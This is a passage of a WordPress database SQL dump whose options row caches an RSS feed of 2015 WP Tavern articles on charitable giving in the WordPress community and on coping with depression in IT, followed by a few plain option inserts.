Foundation</a></li>\n<li><a href=\"http://www.rothkochapel.org/\">Rothko Chapel</a></li>\n<li><a href=\"http://samasource.org\">Samasource</a></li>\n<li><a href=\"http://www.us-irelandalliance.org/\">US-Ireland Alliance</a></li>\n</ul>\n<p>To celebrate his 30th birthday, Mullenweg requested that donations be made to his <a title=\"https://my.charitywater.org/matt-30\" href=\"https://my.charitywater.org/matt-30\">Charity water campaign</a> in lieu of gifts. The goal was $30K, but the campaign raised over $44K.</p>\n<h2>Mitch Canter of Studionashvegas</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/JusticeandMercyImage.png\" rel=\"prettyphoto[37461]\"><img class=\"aligncenter size-full wp-image-37505\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/JusticeandMercyImage.png?resize=374%2C140\" alt=\"Justice and Mercy International\" /></a></p>\n<p>Mitch Canter runs <a title=\"http://www.studionashvegas.com\" href=\"http://www.studionashvegas.com\">Studionashvegas</a>, a full service WordPress development agency. Canter has attended two mission trips with a group called <a title=\"http://justiceandmercy.org/\" href=\"http://justiceandmercy.org/\">Justice and Mercy International</a>. The group&#8217;s mission is to <em>make justice personal for the poor, the orphaned, and the forgotten</em>. He&#8217;s also <a title=\"https://medium.com/@mitchcanter/ive-left-my-heart-in-moldova-3012799c4c60\" href=\"https://medium.com/@mitchcanter/ive-left-my-heart-in-moldova-3012799c4c60\">traveled to Chisinau, Moldova</a> and Prague, Czech Republic to help assess long-term needs and provide any necessary supplies for the short-term as well as interact with local children.</p>\n<p>Canter and his wife also sponsor Veronica, a Moldovan orphan, through Justice and Mercy International. The couple routinely writes letters to Veronica and plans to see her the next time they visit the country. They also serve in their local church and volunteer with the local food bank, <a title=\"http://www.onegenaway.com/\" href=\"http://www.onegenaway.com/\">One Gen Away</a>, to provide meals to families who are in need.</p>\n<h2>Syed Balkhi of WPBeginner</h2>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/PencilsofPromiseLogo.png\" rel=\"prettyphoto[37461]\"><img class=\"alignright size-full wp-image-37506\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/PencilsofPromiseLogo.png?resize=245%2C72\" alt=\"Pencils of Promise Logo\" /></a>Since 2013, Syed Balkhi and WPBeginner have helped build at least three new schools in Guatemala through the <a title=\"http://pencilsofpromise.org/\" href=\"http://pencilsofpromise.org/\">Pencils of Promise</a> charity. Pencils of Promise is a for-purpose organization that builds schools, trains teachers, and funds scholarships. In 2014, WPBeginner <a title=\"http://wptavern.com/wpbeginner-turns-5-celebrates-with-campaign-to-build-two-new-schools-in-guatemala\" href=\"http://wptavern.com/wpbeginner-turns-5-celebrates-with-campaign-to-build-two-new-schools-in-guatemala\">celebrated its 5th birthday</a> by hosting a huge giveaway and launching a $50K campaign to fund two new schools. The <a title=\"http://wptavern.com/wpbeginner-reaches-funding-goal-to-build-two-new-schools\" href=\"http://wptavern.com/wpbeginner-reaches-funding-goal-to-build-two-new-schools\">campaign was successful</a> and Balkhi says the goal for this year is to build three new schools.</p>\n<h2>PressNomics</h2>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/StJudeChildrensHospital.png\" rel=\"prettyphoto[37461]\"><img class=\"aligncenter size-full wp-image-37507\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/StJudeChildrensHospital.png?resize=784%2C443\" alt=\"St Jude Childrens Hospital\" /></a></p>\n<p>PressNomics is an <a title=\"http://pressnomics.com/\" href=\"http://pressnomics.com/\">annual conference</a> dedicated to the business side of WordPress. Each year, the event donates a portion of its proceeds to <a href=\"http://www.stjude.org\">St. Jude Children&#8217;s Research Hospital</a>. Pagely Co-founder, Joshua Strebel, says the decision to donate to St. Jude was made long before he and his wife had kids, &#8220;St Jude has been our charity of choice for many years. Even before Sally and I had kids, we were touched by those commercials that showed the kids fighting cancer. I&#8217;ve always had a soft spot for kids, coming from a large family. Of all the charities you could give to, St. Jude is a no brainer.&#8221;</p>\n<p>Since 2012, the event has donated over $11K to St. Jude Hospital and Strebel says funding from PressNomics 3 this year will allow them to donate over $10K to a <em>charity yet to be named</em>. &#8220;After PressNomics 1, we donated a little over $5K and there was an anonymous matching donation. After PressNomics 2, we donated a little over $6K. This year the budget has allowed us to donate just over $10K.&#8221;</p>\n<h2>DonorsChoose.org</h2>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/DonorsChooseImage.png\" rel=\"prettyphoto[37461]\"><img class=\"aligncenter size-full wp-image-37501\" src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/DonorsChooseImage.png?resize=1025%2C527\" alt=\"DonorsChoose\" /></a><br />\nWhen I reached out to the community to figure out who gives to charities, I discovered a number of people who use <a title=\"http://www.donorschoose.org/\" href=\"http://www.donorschoose.org/\">DonorsChoose</a>. DonorsChoose is an organization that makes it easy to help classrooms in need. Public school teachers post classroom project requests, which range from pencils for poetry to microscopes for mitochondria-organization.</p>\n<p><a title=\"https://eamann.com/\" href=\"https://eamann.com/\">Eric Mann</a>, who contributes to the organization, had a lot of friends in college who majored in education and went on to become teachers. He discovered that many of them worked in schools with small budgets and limited supplies. He explains why he uses DonorsChoose.org.</p>\n<blockquote><p>I use DonorsChoose.org to help fund the purchase of books for classroom lessons, field trips to museums and science exhibits, and modern laptop computers for technical education. Many of the teachers I sponsor are working in low-income areas with at-risk youth and don&#8217;t have the tools available to make much of a difference without community sponsorship.</p></blockquote>\n<p>Mann believes investing in education is one of the best long-term investments you can make, &#8220;It&#8217;s easy to spend money on this Kickstarter or that IndieGoGo when you get a tangible (or digital) return on the investment. Spending money to help protect and shepherd the education of today&#8217;s youth, though, returns an investment in better educated leaders, educators, and technologists for tomorrow.&#8221;</p>\n<h2>WP Site Care</h2>\n<p>WordPress support agency, <a title=\"http://www.wpsitecare.com\" href=\"http://www.wpsitecare.com\">WP Site Care</a>, contributed to <a title=\"http://www.wpsitecare.com/5-minutes-reflection-look-back-2014/\" href=\"http://www.wpsitecare.com/5-minutes-reflection-look-back-2014/\">several different organizations and initiatives</a> throughout 2014. The list is lengthy and includes:</p>\n<ul>\n<li><a href=\"http://www.autismspeaks.org/\" target=\"_blank\">Autism Speaks</a></li>\n<li><a href=\"http://dangilmore.com/blog/2014/12/04/help-my-wife-fight-cancer/\" target=\"_blank\">Dan Gilmore’s St. Baldrick’s Cancer Campaign</a></li>\n<li><a href=\"https://www.indiegogo.com/projects/buddypress-bbpress-glotpress-development\" target=\"_blank\">BuddyPress, bbPress and GlotPress Development</a></li>\n<li><a href=\"http://www.girlswritenow.org/\" target=\"_blank\">Girls Write Now</a></li>\n<li><a href=\"http://www.girldevelopit.com/\" target=\"_blank\">Girl Develop It</a></li>\n<li><a href=\"https://www.charitywater.org/\" target=\"_blank\">Charity Water</a></li>\n<li><a href=\"http://www.alsa.org/\" target=\"_blank\">ALS Association</a></li>\n<li><a href=\"http://www.aidswalk.net/\" target=\"_blank\">AIDS Walk</a></li>\n<li><a href=\"http://www.heartspring.org/\" target=\"_blank\">HeartSpring</a></li>\n<li><a href=\"http://us.movember.com/\" target=\"_blank\">Movember</a></li>\n<li><a href=\"http://www.afsp.org/\" target=\"_blank\">American Foundation for Suicide Prevention</a></li>\n<li><a href=\"http://www.happyjoe.org/\" target=\"_blank\">Happy Joe</a></li>\n</ul>\n<p>I asked WP Site Care founder, Ryan Sullivan, why he chooses to give back to so many charities and what it means to give back.</p>\n<blockquote><p>We support a number of different causes because any charitable contributions that we’re able to make are a direct reflection of the people at our company. We found out about a number of causes from the WordPress community itself. For example, funding treatment for autism is something that has a personal impact on a few of us at WP Site Care.</p>\n<p>We like to make sure that the causes that are important to individuals become important for all of us collectively. It not only goes to help the causes themselves, but helps us get closer as a working family.</p></blockquote>\n<h2>Individuals Who Received Financial Assistance From The WordPress Community</h2>\n<p><strong>Just Tadlock</strong> &#8211; Near the end of 2013, Justin Tadlock <a title=\"http://justintadlock.com/archives/2013/12/17/help-me-get-a-house-for-christmas\" href=\"http://justintadlock.com/archives/2013/12/17/help-me-get-a-house-for-christmas\">discovered the perfect house</a>, but he didn&#8217;t have the money to cover closing costs, quarterly taxes, and appliances. He requested $5K to cover his costs, but he ended up receiving over $7K. It&#8217;s important to note that the campaign took place around Christmas which is a tough time financially for a number of people. However, the community rallied together to give Tadlock the ultimate Christmas gift.</p>\n<p><strong>Dan Griffiths</strong> &#8211; Dan Griffiths, who is known on Twitter as <a title=\"https://twitter.com/ghost1227\" href=\"https://twitter.com/ghost1227\">Ghost1227</a> and one of the creators of <a title=\"http://wptally.com/\" href=\"http://wptally.com/\">WP Tally,</a> recently found himself in a financial emergency. He needed $2,500 within 24 hours. He reached out to <a title=\"http://wptavern.com/happy-joe-uses-wordpress-to-train-and-help-veterans-find-careers-in-web-technology\" href=\"http://wptavern.com/happy-joe-uses-wordpress-to-train-and-help-veterans-find-careers-in-web-technology\">Happy Joe</a>, an organization that helps veterans in need. Happy Joe founder, James Dalman, published an all points bulletin on Twitter asking for help from the WordPress community. Within <strong>two hours</strong> of the initial call for help, Griffiths reached his goal.</p>\n<p><strong>Kim Parsell&#8217;s Son</strong> &#8211; Kim Parsell&#8217;s son was about to begin a new job when tragically, his <a title=\"http://wptavern.com/kim-parsell-affectionately-known-as-wpmom-passes-away\" href=\"http://wptavern.com/kim-parsell-affectionately-known-as-wpmom-passes-away\">mother passed away</a>. He wasn&#8217;t able to start the job, putting him in a financial bind. He <a title=\"http://www.gofundme.com/wpmom\" href=\"http://www.gofundme.com/wpmom\">created a campaign</a> asking for $1K to help pay bills as he mourned the loss of his mother. Within 42 minutes, 8 people raised $760 of the requested $1,000. When it was all said and done, 33 people raised $2K.</p>\n<p><strong>John James Jacoby</strong> &#8211; In late 2014, John James Jacoby <a title=\"http://wptavern.com/john-james-jacoby-launches-indiegogo-campaign-to-fund-buddypress-bbpress-and-glotpress-development\" href=\"http://wptavern.com/john-james-jacoby-launches-indiegogo-campaign-to-fund-buddypress-bbpress-and-glotpress-development\">launched a crowdfunding campaign</a> asking for $50K in order to work on BuddyPress, GlotPress, and bbPress full-time for 6 months. The <a title=\"http://wptavern.com/buddypress-bbpress-and-glotpress-development-campaign-is-now-fully-funded\" href=\"http://wptavern.com/buddypress-bbpress-and-glotpress-development-campaign-is-now-fully-funded\">campaign was successful</a> generating nearly $52K.</p>\n<h2>Proud To Be a Member of This Community</h2>\n<p>This is just a sample of the generosity expressed by the WordPress community. Although several businesses contribute to charities, it&#8217;s the individuals who receive funding that impress me. If one of us ends up in dire straits, potentially thousands of people are ready to help. It&#8217;s just one more reason why I&#8217;m proud to be a member of this community.</p>\n<p>I&#8217;m certain I missed a few WordPress individuals and businesses that contribute to great causes, if you&#8217;re one of them, please use the comments and tell us about it.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 19 Jan 2015 23:34:59 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:35:\"WPTavern: Tackling Depression in IT\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37466\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"http://wptavern.com/tackling-depression-in-it\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:16947:\"<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/yana-petrova-wceu-2014.jpg\" rel=\"prettyphoto[37466]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/01/yana-petrova-wceu-2014.jpg?resize=854%2C432\" alt=\"yana-petrova-wceu-2014\" class=\"aligncenter size-full wp-image-37472\" /></a></p>\n<p>One of the most unique sessions I attended at <a href=\"http://wptavern.com/wordpress-beyond-boundaries-a-recap-of-wordcamp-europe-2014\" target=\"_blank\">WordCamp Europe 2014</a> was Yana Petrova&#8217;s presentation on <a href=\"http://wordpress.tv/2015/01/06/yana-petrova-why-sometimes-happiness-requires-effort-depression-in-it/\" target=\"_blank\">Depression in IT &#8211; Why Sometimes Happiness Requires Effort</a>. Petrova, a marketing expert and long-time food blogger, is a member of both the WordPress community and the larger tech community in Bulgaria. She has also worked as an organizer for many local technical conferences over the years.</p>\n<p>Her motivation to address the widespread problem of depression in IT grew out of personal experiences with friends and co-workers who were struggling with it. This put her on the path to research the disease and find ways to raise awareness on the topic. I had the opportunity to interview Petrova after the event, and it&#8217;s easy to see why she is a person to whom people would come for advice. Her warm, empathetic personality is combined with a rare willingness to listen to others.</p>\n<p>Petrova&#8217;s experience in food blogging gives her a format for talking about depression in a way that people can understand, which helps to mitigate the stigma that surrounds the issue. We&#8217;ll take a look at some of the recipes she shared in her presentation, but first it&#8217;s important to have a basic understanding of depression.</p>\n<h2>Understanding Depression</h2>\n<p>Nearly everyone knows someone who is suffering from depression, as it afflicts more than <a href=\"http://www.who.int/mediacentre/factsheets/fs369/en/\" target=\"_blank\">350 million people</a> of all ages worldwide and is the leading cause of disability. In the most extreme cases it can lead to suicide.</p>\n<p>Clinical depression is the most severe form, which is often treated with psychological and pharmacological therapies. However, many more people suffer from milder forms of depression from time to time.</p>\n<p>In his TED talk, titled <a href=\"https://www.youtube.com/watch?v=-eBUcBfkVCo\" target=\"_blank\">Depression, The Secret We Share</a>, writer Andrew Solomon said, <strong>&#8220;The opposite of depression is not happiness but vitality.&#8221;</strong> He describes his own dark journey of struggling with depression, which he noticed when all the normal activities of life and work began to seem like too much.</p>\n<blockquote><p>One of the things that often gets lost in discussions of depression is that you know it&#8217;s ridiculous. You know it&#8217;s ridiculous while you&#8217;re experiencing it. You know that most people manage to listen to their messages, and eat lunch, and organize themselves to take a shower and go out the front door, and that it&#8217;s not a big deal.</p>\n<p>And yet you are in its grip and you are unable to figure out any way around it. And so I began to feel myself doing less and thinking less and feeling less. It was a kind of nullity, and then the anxiety set in.</p></blockquote>\n<p>Solomon notes that people tend to confuse depression, grief, and sadness, but understanding the trajectory and duration of these feelings will help to clarify the situation. While grief is explicitly reactive and related to loss, depression doesn&#8217;t always have an easily identifiable cause. Some forms of depression will require professional help for the person to regain a semblance of normal living.</p>\n<h2>Sources or Triggers of Depression in IT</h2>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/04/emergency.jpg\" rel=\"prettyphoto[37466]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/04/emergency.jpg?resize=1024%2C482\" alt=\"photo credit: Code & Martini by Ivana Vasilj - cc license\" class=\"size-full wp-image-21873\" /></a>photo credit: <a href=\"https://flic.kr/p/dLUWMb\">Code &#038; Martini</a> by <a href=\"https://www.flickr.com/photos/ivanavasilj/\">Ivana Vasilj</a> &#8211; cc license\n<p>Depression in the IT industry can be more difficult to address, as many tech workers are intelligent, independent, and in high demand. Three years ago, when Yana Petrova and her colleague first proposed a presentation on depression for a local tech conference, she experienced a great deal of resistance.</p>\n<p>&#8220;There were a lot of discussions surrounding it and people in the organizations were hesitant to include it,&#8221; she said. &#8220;They believed that people who are in IT are earning very well, the people who are suffering should just go to the doctor, there&#8217;s no need to discuss it at a technical conference.&#8221; The presentation was so impactful, however, that some of the top Bulgarian psychologists heard about it and encouraged them to continue raising awareness.</p>\n<p>The IT industry has several unique factors that seem to contribute to depression and anxiety. Many people in the WordPress community, in particular, work alone at home as freelancers or with distributed companies. Unless the individual is motivated, this work environment can severely limit healthy social interactions. Additional pressures can also lead to periods of depression, including:</p>\n<ul>\n<li>Client work and relationships</li>\n<li>Pressure to always be connected</li>\n<li>Interaction with the larger development community</li>\n<li>An industry emphasis on high competency forces workers to continue building skills on top of ever-changing technologies, while also completing daily work</li>\n<li>Not understanding the limits of your body/emotions</li>\n</ul>\n<p>&#8220;I think that most of the time they are trying to become really good at what they are doing, which requires most of their attention and most of their time,&#8221; Petrova said, commenting on the lifestyle of many developers with whom she is connected.</p>\n<p>&#8220;When you are reading code, coding most of your time, and doing things related to coding, then a social part is missing &#8211; the part related to relationships, self-esteem, knowing yourself. You&#8217;re just not going deeper into that, because you are giving your time and attention to something else, trying to be good at something else. Our brain resources are kind of limited.&#8221;</p>\n<p>Client interaction is also a major cause of stress and anxiety for self-employed professionals. When you work from home by yourself without a team, criticism from clients can have a severe impact on your feelings of self-worth. If you don&#8217;t have a healthy reservoir of outside interests and hobbies, you can easily become mired in client negativity.</p>\n<p>During Petrova&#8217;s presentation at WordCamp Europe, she received questions about how to deal with clients who can damage a developer&#8217;s self-confidence. Sometimes clients don&#8217;t understand that they are not working with machines but rather real people with families and lives.</p>\n<p>&#8220;Because a lot of people are working from home, what the client thinks and what the community thinks about their work can be a source of depression,&#8221; she said. &#8220;Actually, a lot of people have mentioned that clients are sometimes rude in explaining how incompetent they were.&#8221; This can have a devastating impact on a developer who is lacking self-confidence, outside social connections, and restorative hobbies.</p>\n<p>&#8220;Questions about clients wasn&#8217;t something I expected, but it&#8217;s another vertical to explore,&#8221; Petrova said. It has inspired her to start working on a talk about relationships, clients, teams, and how to preserve your team.</p>\n<p>Petrova has observed that many people working in IT don&#8217;t prioritize knowing themselves and understanding their reactions, although this is not unique to the IT industry. They are often blind to their mental health issues and don&#8217;t know when to seek help.</p>\n<h2>Tips for Dealing with Depression and Anxiety</h2>\n<p>Petrova&#8217;s presentation centered around ways to prevent depression and successfully cope with work-related stress and anxiety. &#8220;Depression is not something that defines you for a lifetime,&#8221; she said. &#8220;It might be just a problem, and it might be that, at this time, happiness requires more effort for you.&#8221;</p>\n<p>She believes that depression is an important mechanism in the human consciousness. &#8220;It&#8217;s a signal for us that change is necessary &#8211; changes about us or changes somewhere around us.&#8221;</p>\n<p>Petrova compares cooking recipes to recipes for coping with depression, noting that it&#8217;s important to adapt those recipes to work with your preferences and needs. Her presentation highlights five ways that you can discover and create your own recipes for preventing depression from setting in.</p>\n<h4>1. Take deep breaths.</h4>\n<p>Deep breathing practices help you to regain calmness and perspective. &#8220;They say that graveyards are full of irreplaceable people,&#8221; she said. &#8220;Actually, we all are, but it&#8217;s more important that we are alive, we are here, and we are happy. We can never control everything in the world, and we should never try to take responsibility for all the things here. We often tend to forget that our bodies have their limits and we are fragile.&#8221; Deep breathing reminds us that we are not machines.</p>\n<p>In addition to breathing, Petrova suggests finding other activities outside of work that will help you to gain perspective on life. &#8220;Dedicate special time for your recipes,&#8221; she said. &#8220;Start spending an hour in the morning with your coffee. Spend Sunday afternoon with someone or with friends,&#8221; she suggests.</p>\n<p><strong>&#8220;But never give away this time. Never give it away for work. Never replace it for something, never sacrifice it. It&#8217;s important that you keep this thing and slow down.&#8221;</strong></p>\n<h4>2. Make lists.</h4>\n<p>Petrova advises people to make lists of recipes that work for them in preparation for moments when it&#8217;s difficult to think clearly. &#8220;Think of those lists as emergency plans. When the grey veil of depression comes, your rituals may not seem as important or as life-saving as the day before,&#8221; she said. &#8220;You might not enjoy them as you did before, so you should have a list of things.&#8221; Perhaps it&#8217;s a list of movies you wanted watch, or places you wanted to visit, a restaurant or recipe you wanted to try.</p>\n<blockquote><p>At the beginning you won&#8217;t be willing to do anything from this list. Those things will look silly and you say no this is not the time to do this. You will be preoccupied with all of your worries right now. Force yourself and just pick a thing and start doing it. Start those lists today and obey them frequently.</p></blockquote>\n<p>Petrova shared a few simple items on her own list &#8211; i.e. eating avocados, making herself a chai latte, enjoying a local spicy soup. If you maintain a clear list of things that make you feel better, you have some activities to turn to when things start to become stressful at work.</p>\n<h4>3. Provide small wins.</h4>\n<p>Make goals for yourself that put you on the path to success with frequent, small milestones. This will help to keep you oriented towards fulfillment. &#8220;Another recipe of mine was to keep an editorial calendar,&#8221; Petrova said. &#8220;Even if I am not feeling well, I already had something planned, so I can keep moving in that direction.&#8221;</p>\n<h4>4. Think about your thinking.</h4>\n<p>People who excel at solving some of tech&#8217;s most complex problems can also be notoriously masterful at avoiding introspection. Petrova approaches the topic of introspection with the idea of &#8220;debugging yourself,&#8221; a concept with which many in tech are familiar.</p>\n<p>She suggests writing your own user manual to document how you work and what keeps you healthy. &#8220;Write your own user manual. Start writing a user manual for yourself and imagine you are giving it to someone else. This will help you think more about how you are thinking,&#8221; she said.</p>\n<p>&#8220;You can see that there are a lot of small hacks that can help you feel better. Just imagine how empowering it might be to discover more,&#8221; she said.</p>\n<p>&#8220;This requires a lot of patience and dedication. It usually takes time for reading and time for writing. It takes time to debug your mind.&#8221; Petrova suggests writing down all of the things that help your mind work better so that you have that manual for when depression tries to settle in.</p>\n<p>&#8220;Debug yourself, but if you can&#8217;t do it yourself, then try to talk to someone,&#8221; Petrova said. &#8220;We cannot resolve anything by ourselves.&#8221;</p>\n<h4>5. Learn to listen, learn to share.</h4>\n<p>You can never underestimate the importance of community in maintaining your mental health. The community is stronger when people overcome their irrational inhibitions and learn to share their stories and listen to each other.</p>\n<p>&#8220;It&#8217;s not really easy to listen the proper way, but you can sometimes save people by listening to them carefully,&#8221; Petrova said. &#8220;You can empower them by listening to them.</p>\n<p>People need to tell their stories to realize what is happening. Sometimes when you are keeping things only in your head, you are not realizing the power of your situation.&#8221;</p>\n<p>When should depression lead you to seek professional help? &#8220;In some official resources, they say if you are feeling like this for four weeks then go find some help,&#8221; Petrova said.</p>\n<p>&#8220;But I think that the more you are getting to know yourself, the more you can feel if you need to meet with someone or talk with someone. The doctor might not be the first person. The first person might be a friend or a relative or someone who is closer to you. Or just someone you see, someone you believe in and decide to tell your story to. I really believe that it&#8217;s powerful to tell stories.&#8221;</p>\n<h2>Staying Healthy and Preventing Depression</h2>\n<p>Petrova recommends a book called <a href=\"http://www.amazon.com/The-Healthy-Programmer-Pragmatic-Programmers/dp/1937785319\" target=\"_blank\">The Healthy Programmer</a>, which contains the basics of healthy living for people who work most of the time in a seated position. She believes that movement is especially important for those who work from home and set their own schedules.</p>\n<blockquote><p>The first thing is related to moving/movement. Are you moving enough? Are you doing active things, sports? This is really important, because if you are living where you are working, then you can find yourself in a situation where you are staying home, ordering food all the time. You forget all the healthy things you could do to feel better, for your body to feel better and your mind to work well. It&#8217;s really related.</p></blockquote>\n<p>If you&#8217;re staying active and able to use your normal problem-solving skills to debug yourself, you will greatly lessen the chances of falling into depression. Building up these habits takes time, but you&#8217;re also less likely to be crippled by stress and anxiety. In the future, Petrova plans to start a blog called &#8220;The Happiness Cookbook&#8221; in order to encourage people to share their recipes with the community.</p>\n<p>&#8220;Get to know yourself better and your reactions to different situations,&#8221; Petrova advises. &#8220;You really need a lot of time to know what&#8217;s happening to you and to know how to react in a timely way for prevention.</p>\n<p>&#8220;We all have our stressful moments. We all have our sad moments. You are certain to have them in your lifetime. But you can learn how to prevent your reactions, what to do when depression happens, and the best way to overcome it. The temporary feelings can be over at some point with the help of simple tips, and then you are not going to get depressed. Otherwise, you are just digging into that.&#8221;</p>\n<p>Obviously, there are some forms of depression that will ultimately require professional help. Petrova&#8217;s tips for prevention are intended to help folks before they reach a very dark place where they have lost interest in work completely and are struggling to find vitality.</p>\n<p>&#8220;Depression means that you need to change something, for yourself, around yourself, about yourself,&#8221; she said. &#8220;This is the key message. Just research the pain that made you feel like this and start debugging it step by step.&#8221;</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 19 Jan 2015 22:39:35 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"Matt: Pope Francis on Climate Change\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44598\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:52:\"http://ma.tt/2015/01/pope-francis-on-climate-change/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:718:\"<blockquote><p>He has been called the “superman pope”, and it would be hard to deny that Pope Francis has had a good December. Cited by President Barack Obama as a key player in the thawing relations between the US and Cuba, the Argentinian pontiff followed that by lecturing his cardinals on the need to clean up Vatican politics. But can Francis achieve a feat that has so far eluded secular powers and inspire decisive action on climate change?</p></blockquote>\n<p>The Guardian on <a href=\"http://www.theguardian.com/world/2014/dec/27/pope-francis-edict-climate-change-us-rightwing\">Pope Francis’s edict on climate change will anger deniers and US churches</a>. Definitely the coolest pope in my lifetime.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Sun, 18 Jan 2015 16:30:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";a:10:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 03 Feb 2015 00:08:54 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:14:\"content-length\";s:6:\"248986\";s:10:\"connection\";s:5:\"close\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Mon, 02 Feb 2015 23:45:14 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:11:\"HIT lax 250\";s:13:\"accept-ranges\";s:5:\"bytes\";}s:5:\"build\";s:14:\"20141124234515\";}", "no");
INSERT INTO `wp_options` VALUES("181", "_transient_timeout_feed_mod_867bd5c64f85878d03a060509cd2f92c", "1422965334", "no");
INSERT INTO `wp_options` VALUES("182", "_transient_feed_mod_867bd5c64f85878d03a060509cd2f92c", "1422922134", "no");
INSERT INTO `wp_options` VALUES("191", "db_upgraded", "", "yes");
